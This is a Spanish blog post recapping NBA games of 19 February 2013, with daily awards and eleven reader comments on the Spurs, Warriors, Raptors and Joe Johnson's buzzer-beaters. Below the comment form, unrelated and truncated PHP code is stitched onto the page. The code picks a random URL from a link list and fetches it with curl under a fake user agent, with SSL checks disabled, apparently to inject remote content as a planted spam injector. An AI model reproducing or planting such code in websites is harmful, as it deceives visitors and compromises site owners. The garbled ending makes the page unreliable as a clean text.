La Crónica: Las espuelas de Tony Parker

20 de February de 2013 por txusma

Los Spurs son el mejor equipo de la competición con diferencia y aún así nadie les da como favoritos en prácticamente ninguna apuesta. Ayer volvieron a coincidir muchos minutos su Big Three, Parker, Ginobili y Duncan, lo que debería llenar de preocupación a sus contrarios. A pesar de que Duncan y Ginobili no han jugado varios partidos para recuperarse de sus respectivas molestias y dosificarse, los Spurs están ahí, en lo más alto. Anoche se impusieron a los Kings de la mano del base más infravalorado de la liga, Tony Parker. A su lado, gran aportación de Kawhi Leonard, un hombre Popovich donde los haya, y aportaciones puntuales de Ginobili y Duncan, cada uno donde más sabe (108-102).

En el Oeste se ha abierto un hueco entre el quinto y el sexto clasificado. Los Nuggets ganaron a los Celtics con Ty Lawson y Danilo Gallinari como destacados, aprovechando un mal partido de Paul Pierce y un buen acierto en los tiros libres (90-97). En cambio, los Warriors cayeron frente a sus inmediatos perseguidores, los Jazz, que están ya a punto de pasarlos en la clasificación (101-115). La vuelta de Andrew Bogut no ha sido la cerecita que tenía que coronar el pastel y se está yendo por la borda el buen trabajo de la primera parte de la temporada. Todavía tienen 5 victorias de margen sobre el noveno clasificado pero bien harían en ir espabilando. 

El partido más destacado del día fue el Bucks – Nets con Joe Johnson disfrazándose de héroe y anotando no uno sino 2 buzzer-beaters. Primero, un triplazo para mandar el partido a la prórroga y después, un tiro de 2 para sellar la victoria de su equipo (111-113). Los rumores de traspasos que corren por los Bucks no afectaron a Jennigs y Ellis, que cuajaron muy buenos partidos y plantaron cara en todo momento.

En el resto de partidos del día, Marc Gasol se llevó el duelo hispano ante los Pistons de Calderón (105-91), Toronto se impuso a los Wizards gracias a un gran DeRozan y una buena defensa (96-88), Charlotte se impuso a Orlando gracias un buen inicio de partido (105-92), los Bulls ganaron a los Hornets el día que volvía Kirk Hinrich (96-87) y Goran Dragic llevó en volandas a los suyos a la victoria frente los Blazers (102-98).

PREMIOS

MVP: Tony Parker fue el que mejor números consiguió anoche (30 puntos y 11 asistencias) pero los 2 buzzer-beaters que anotó Joe Johnson, autor además de 24 puntos, se merecen el premio del día.

Rookie: Bradley Beal se fue a los 25 puntos, Damian Lillard a los 24 puntos y 7 asistencias y Anthony Davis a los 15 puntos, 10 rebotes y 4 robos. ¡Vaya TOP-3!

Sorpresa: Goran Dragic se vistió del mejor Steve Nash y se fue a las 18 asistencias, su récord personal. Gerald Henderson también jugó un gran partido con 24 puntos y 10 rebotes.

Decepción: Terrible partido de Paul Pierce ante los Nuggets. El alero de los Celtics no dio una a derechas y acabó anotando solo 2 de sus 14 lanzamientos a canasta. Ryan Anderson y Andre Iguodala fueron otros que no tuvieron el día de cara a canasta. El primero falló 9 de sus 11 intentos y el segundo los 7 que intentó.

Esfuerzo en vano: 34 puntos, 6 rebotes y 7 asistencias que no le condujeron a la victoria por culpa de Joe Johnson. Hablamos de Brandon Jennings.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Los Warriors se van a complicar la vida como no espabilen. Están encajando 115 puntos de media en esta racha de 6 derrotas y vuelven todas las sospechas que teníamos sobre su defensa. A ver si alguno de los especialistas en los GSW que tenemos por aquí nos da su opinión 😉

    Y la temporada de Tony Parker es sin duda digna de MVP. 21-8-3 con un 53,5% en tiros de campo y los Spurs en primera posición de la liga pese a que Duncan se ha perdido 10 partidos y Manu 13. Es brutal.

      Citar

  2. Jose Luis dice:
    #2

    Una cosa que pasa un poco desapercibida es la capacidad de los servicios médicos y fisioterapeutas de Phoenix Suns. Nash y Hill han sido grandes ejemplos estos años, pero ojo a Jermaine O’Neal, haciendo un temporadón y sin apenas lesiones, cuando en Boston ni se le veía por esta misma razón. Tienen un elixir de la juventud o algo, fijo.

      Citar

  3. txusma dice:
    #3

    Jose Luis:
    Tienen un elixir de la juventud o algo, fijo.

    ¿Me pongo a malpensar?

      Citar

  4. Jose Luis dice:
    #4

    Es muy curioso ciertamente. Hill después de sus graves lesiones, ha rendido a un nivel espectacular, y llega a Clippers, y lesiones y mal rendimiento. La lesión de Nash no puede achacarse a esto, porque es un impacto, y ya en Phoenix tuvo ciertas limitaciones en la espalda. Lo de Jermaine O’Neal es para mirárselo, vaya temporadón está haciendo.

      Citar

  5. jonasp dice:
    #5

    Tema GSW

    A el equipo se le han juntado 5 de las 6 derrotas seguidas contra equipos del Oeste , fuera de casa la otra derrota es contra Houston en casa y por jugadores es un equipo que nos viene mal.

    El problema es claramente el uso de la zona, se está abusando de ella y nos están anotando muchos triples, además estamos fatal en las ayudas, esto unido a el bajón que ha dado el banquillo en cuanto a aportación , a Landry no se le usa apenas ..

    Dentro de lo malo 16 de los últimos 22 se juegan en el Oracle , esperemos que ganen hoy a PHx y aprieten en intensidad

      Citar

  6. MagicJohnson32 dice:
    #6

    jonasp:
    Tema GSW

    A el equipo se le han juntado 5 de las 6 derrotas seguidas contra equipos del Oeste , fuera de casa la otra derrota es contra Houston en casa y por jugadores es un equipo que nos viene mal.

    El problema es claramente el uso de la zona, se está abusando de ella y nos están anotando muchos triples, además estamos fatal en las ayudas, esto unido a el bajón que ha dado el banquillo en cuanto a aportación , a Landry no se le usa apenas ..

    Dentro de lo malo 16 de los últimos 22 se juegan en el Oracle , esperemos que ganen hoy a PHx y aprieten en intensidad

    ¡Gracias, Jonasp! ¿Crees que tiene algo que ver la vuelta de Bogut? ¿Que, de alguna manera, el equipo se ha desajustado? Se suponía que con él la defensa sólo podía ir a mejor, pero los resultados sugieren otra cosa.

      Citar

  7. Esteban dice:
    #7

    apuesta al are, llegaran los RAPTORS a PO?

    hoy estan a 5 juegos de los bucks y los veo muy en alza, mientras que tienen 3 derrotas mas que los 76ers

    con el plantel completo, han ganado ganado y ganado y cuidado que siga asi

    derozan esta lejos de ser el primer espada de un equipo, pero al lado de gay que demuestra que si puede serlo, es un joya pulida, ha mejorado su rendimiento desde la llegada de rudy

    lowry esta algo bajon, pero se espera su despertar en cualquier momento

    valanciunas vuelve a tere gran pinta de ceter en el futuro y amir hace lo de simpre

    barganani saliendo desde el banco esta respondiendo, si jugara de titular como tercer espada del equipo, cuidado mucho cuidado

    y aesto hay que sumarle a ross y anderson…

    vaya equipo

      Citar

  8. Esteban dice:
    #8

    por otro lado en los NETS jojo ganandose sus millones, cuantos buzzer-beaters ha lanzado esta temporada?

    esta teniedno una temporada horrorosa, pero aun sabe cerrar juegos, y eso vale ORO en PO

      Citar

  9. Jose Luis dice:
    #9

    Totalmente de acuerdo contigo Esteban, en todo. JoJo da victorias en finales apretados.

      Citar

  10. Ruxixón dice:
    #10

    Ross ha jugado 3 minutos…con DeRozan y Gay y se sumas Anderson como principal referencia exterior desde el banco el pobre va a jugar poco de aquí a final de temporada,y está para jugar muchos más minutos.Como dije en la entrada del AllStar espero que no se queden en un saltarín matador y pueda tener minutos en Toronto o en cualquier otro equipo -si hubiera recibido Memphis a Ross hubiera sido una pasada-.Por otra parte Calderón casaría mejor en este equipo que Lowry,creo que un base más asistente que anotador sería ideal para Toronto,pero bueno,esta temporada ya tiran con lo que tienen.Veremos si logran ir a PO,en buena parte dependerá de que hagan los Bucks antes del deadline y cómo afectará a su química de equipo si Ellis/Jennings siguen o no

      Citar

  11. Esteban dice:
    #11

    ross lleva toda la temporada jugando “lo justo”, necesita mas minutos, y creo que con el tiempo los tendra y popdra hacerse un buen sexto hombre,

    lo mejor que podrian hacer los raptors es un combo bargnani y ross, ese combo lograria un gran traspaso en materia de salarios y calidad de jugador,
    no se me ocurre quien podria entrar a cambio en ese trade, pero podrian smar un buen jugador barato y expirings q le den aire el proximo año

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>